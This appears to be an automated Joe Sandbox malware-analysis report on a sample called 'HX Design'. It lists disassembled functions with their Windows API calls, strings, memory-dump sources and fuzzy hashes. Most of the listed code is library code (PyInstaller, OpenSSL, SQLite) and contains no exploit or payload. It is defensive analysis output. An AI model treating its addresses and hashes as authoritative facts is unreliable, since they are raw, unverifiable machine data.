Instruction Fuzzy Hash: 44D1D332B08B429AEB20EF65D4407ADB7A0FB44788F900135EE4D57B96CF78E099D794

Function 00007FF73207ED10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF73207F0AA,?,?,00000294B2908EB8,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE8C
GetProcAddress.KERNEL32(?,?,?,00007FF73207F0AA,?,?,00000294B2908EB8,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE98

Strings

api-ms-, xrefs: 00007FF73207EDD6
ext-ms-, xrefs: 00007FF73207EDE9

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction ID: 1ae3251433425d48dc2999c71131b0912bad1daea6f160dbf7a7001fc4b6ab02
Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
Instruction Fuzzy Hash: A1412831B1AA02A1FA15FB1A9800675A391FF48B90FC84535DD1D47394EFBCE84DE360

Function 00007FF732062C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
MessageBoxW.USER32 ref: 00007FF732062D99

Strings

[PYI-%d:ERROR] , xrefs: 00007FF732062CA6
<FormatMessageW failed.>, xrefs: 00007FF732062D70
Error, xrefs: 00007FF732062D8C
%ls: , xrefs: 00007FF732062D22

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 45ceae76b9c750aa1d07ccff3a12140a5f95895c8197e93fc1470a1ba7bb68be
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 2731D822708B4166E620BB25A8142BBA691FF88798F810136EF4D93759EF7CD54AD710

Function 00007FFE00311497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON

Download Yara Rule

Strings

SHA2-256, xrefs: 00007FFE003692D7
HMAC, xrefs: 00007FFE0036928B
..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFE00368F9B, 00007FFE003691CA, 00007FFE00369353, 00007FFE003693D4, 00007FFE00369444
tls_construct_stoc_cookie, xrefs: 00007FFE00368F8F, 00007FFE003691BE, 00007FFE0036934C, 00007FFE003693C8, 00007FFE0036943D
, xrefs: 00007FFE003692A3

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction ID: 21de8796a2953f165f9ecd7e4b154539f15bd7a799aaeb8e1a70b77284a8e036
Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
Instruction Fuzzy Hash: 45D15B65B0CA4381FB56EA6295503FE13A5AF89784F848032DF0E47BEEDE7CE5068351

Function 00007FFE003126E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

SSL_CTX_use_serverinfo_file, xrefs: 00007FFE0033A521, 00007FFE0033A562, 00007FFE0033A626, 00007FFE0033A79C, 00007FFE0033A7D2, 00007FFE0033A7FB, 00007FFE0033A826, 00007FFE0033A84A
SERVERINFO FOR , xrefs: 00007FFE0033A5E6
..\s\ssl\ssl_rsa.c, xrefs: 00007FFE0033A52D, 00007FFE0033A56E, 00007FFE0033A62D, 00007FFE0033A69B, 00007FFE0033A6F6, 00007FFE0033A70F, 00007FFE0033A729, 00007FFE0033A7A8, 00007FFE0033A7DE, 00007FFE0033A802, 00007FFE0033A832, 00007FFE0033A856, 00007FFE0033A878, 00007FFE0033A88E, 00007FFE0033A8A4, 00007FFE0033A8BA
SERVERINFOV2 FOR , xrefs: 00007FFE0033A650

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction ID: da0e78a397066cdf44edec9c57f84cfda9a08ce15882782a9ed367bfc7bf4a28
Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
Instruction Fuzzy Hash: 1EB18165B08A4299FB12EB61D8802FD67A5BF85B84F404032EB8D07BFDDE7CE6058341

Function 00007FFDFB318F60 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB35D0A0), ref: 00007FFDFB3190FD

Strings

8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB318FAA
API called with finalized prepared statement, xrefs: 00007FFDFB318F8C
%s at line %d of [%.10s], xrefs: 00007FFDFB318FC3
misuse, xrefs: 00007FFDFB318FB7
API called with NULL prepared statement, xrefs: 00007FFDFB318F74

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 4225454184-3538577999
Opcode ID: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
Instruction ID: 33ec0134d2096d16557d12876cedbd2b6531e098bdf681dadca03a08247bdd18
Opcode Fuzzy Hash: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
Instruction Fuzzy Hash: B351A221F4B653A6FB15AB159820AB863D9AF46B98F046231CD6D473EDDE3DE4468300

Function 00007FF73206DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD4D
GetLastError.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD85
FreeLibrary.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDFF

Strings

api-ms-, xrefs: 00007FF73206DD6D

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 0e0bd18d68acd259c9afd2594edc42d964b6ad71fa5ace60548169a8753dc1e1
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 3931D621B1A642A1EE11BB06A4006B5A3D4FF49BA4FD94535DD3E5B390DFBCE448D328

Function 00007FF732062A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF73206351A,?,00000000,00007FF732063F23), ref: 00007FF732062AA0

Strings

WARNING, xrefs: 00007FF732062AAF
Warning [ANSI Fallback], xrefs: 00007FF732062B0F
[PYI-%d:%s] , xrefs: 00007FF732062AA8
Warning, xrefs: 00007FF732062B1E
0, xrefs: 00007FF732062B16

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 6f41bccdc65c8b3659487b17931ac05f67b1741db81dcd0c9ea571957cf4e40e
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 5321A332719781A2E720AB55F8407E6A394FB88784F800132FE8C83759DFBCD149D750

Function 00007FF732068570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF732068590
OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
GetTokenInformation.ADVAPI32 ref: 00007FF7320685C8
GetLastError.KERNEL32 ref: 00007FF7320685D2
GetTokenInformation.ADVAPI32 ref: 00007FF732068612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73206862E
CloseHandle.KERNEL32 ref: 00007FF732068646

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction ID: 99ab8d3462857a18c1737d43d3f8125bc7726cb1d0dcaa71e4af67ac107d6d1d
Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction Fuzzy Hash: B9213231B0CA4252EB50AB55B58423AE3A0FF857A0F900235EA6D83BE5DEFCD44DDB14

Function 00007FF73207B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF73207B15F
FlsGetValue.KERNEL32 ref: 00007FF73207B174
FlsSetValue.KERNEL32 ref: 00007FF73207B195
FlsSetValue.KERNEL32 ref: 00007FF73207B1C2
FlsSetValue.KERNEL32 ref: 00007FF73207B1D3
FlsSetValue.KERNEL32 ref: 00007FF73207B1E4
SetLastError.KERNEL32 ref: 00007FF73207B1FF

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction ID: be417e27483c94adb8c49ff48fcef4bc5467617b84a97c80b7a7359d73fb7d4d
Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction Fuzzy Hash: 8B219F30F0D242A1FA5873299A5513AD2425F447B0FD44734D93E47BD6DEACB849E760

Function 00007FF732087D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF732087D9D
GetLastError.KERNEL32 ref: 00007FF732087DA9
CloseHandle.KERNEL32 ref: 00007FF732087DC1
CreateFileW.KERNEL32 ref: 00007FF732087DEC
WriteConsoleW.KERNEL32 ref: 00007FF732087E0B

Strings

CONOUT$, xrefs: 00007FF732087DCD

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: a6552da9b8e83610aa44058c33b145efd1b1d8ab4fd2ce3cfe5d778f4bc21481
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 3F118431618A4196E750AB52E85432AE2A0FB88FE4F940234D96D877A4DFBCD818C750

Function 00007FFDFB37EDE0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB37EE86

Strings

vtable constructor failed: %s, xrefs: 00007FFDFB37EFF9
hidden, xrefs: 00007FFDFB37F27D
vtable constructor did not declare schema: %s, xrefs: 00007FFDFB37F138
vtable constructor called recursively: %s, xrefs: 00007FFDFB37EFB2

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
API String ID: 4225454184-1299490920
Opcode ID: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
Instruction ID: a890a4a33c2a732200e65e647b67636b6ad9e41b42b1644de489efb7ee599358
Opcode Fuzzy Hash: fa3dc690295e3f608377f27ab0a4f558a20eccf051d3fb6e08adeb7d0f797da8
Instruction Fuzzy Hash: 8902BC22B0EB8282EB519B12E560BBA77A5FB44B94F144236DE6D477E8DF3CE451C300

Function 00007FF732068ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068F5A

Part of subcall function 00007FF732069390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7320645F4,00000000,00007FF732061985), ref: 00007FF7320693C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732068FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF732069055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF732063FB1), ref: 00007FF73206906A

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction ID: b0f7528cda2152583152ab0b82cf054dacf1a85aacce76245cca4c27958c7200
Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction Fuzzy Hash: 5341D762B19686A5FA30BB11A5402BAF394FF84BC4F840135DF8D57B89DEBCE508D724

Function 00007FFDFB30C000 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 366COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30C14D
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB30C2A7

Strings

database corruption, xrefs: 00007FFDFB30C100, 00007FFDFB30C247
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDFB30C0F3, 00007FFDFB30C23A
%s at line %d of [%.10s], xrefs: 00007FFDFB30C10C, 00007FFDFB30C253

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 4225454184-3727861699
Opcode ID: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
Instruction ID: ae95ac9b8c867ec8b41ff1625ac283e1ce2d5c8ee03a28578324f3ecd58753e9
Opcode Fuzzy Hash: eab345d482f7baabdec9e474e12e39428ea820bd0b391c33a24823f67c697a16
Instruction Fuzzy Hash: 42F18A7270AB8287DB909B55E050BAD77A4FB45BC8F548036EE9E43BA9DF39D844C700

Function 00007FFDFB346680 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON

Download Yara Rule

APIs

00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB346812
00007FFE1A463010.VCRUNTIME140 ref: 00007FFDFB346A9E

Strings

foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFB346705
unknown column "%s" in foreign key definition, xrefs: 00007FFDFB346A2E
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFB34672E

Memory Dump Source

Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true

Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd

Similarity

API ID: 00007A463010
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 4225454184-272990098
Opcode ID: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
Instruction ID: d5af59292b552a68024325648d4469fd522a7f6a0ba903d7339c1acd0fcb3e67
Opcode Fuzzy Hash: 92dd0ee7cd3e1cdafc56de997d58c6f6f428c161758f1bf7218e81256f987700
Instruction Fuzzy Hash: BED1D362B0ABA2C2EB609F569864A792BE1FB41BC4F044171DE6D037E9DE3CE645C300

Function 00007FF7320690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF732068570: GetCurrentProcess.KERNEL32 ref: 00007FF732068590
Part of subcall function 00007FF732068570: OpenProcessToken.ADVAPI32 ref: 00007FF7320685A3
Part of subcall function 00007FF732068570: GetTokenInformation.ADVAPI32 ref: 00007FF7320685C8
Part of subcall function 00007FF732068570: GetLastError.KERNEL32 ref: 00007FF7320685D2
Part of subcall function 00007FF732068570: GetTokenInformation.ADVAPI32 ref: 00007FF732068612
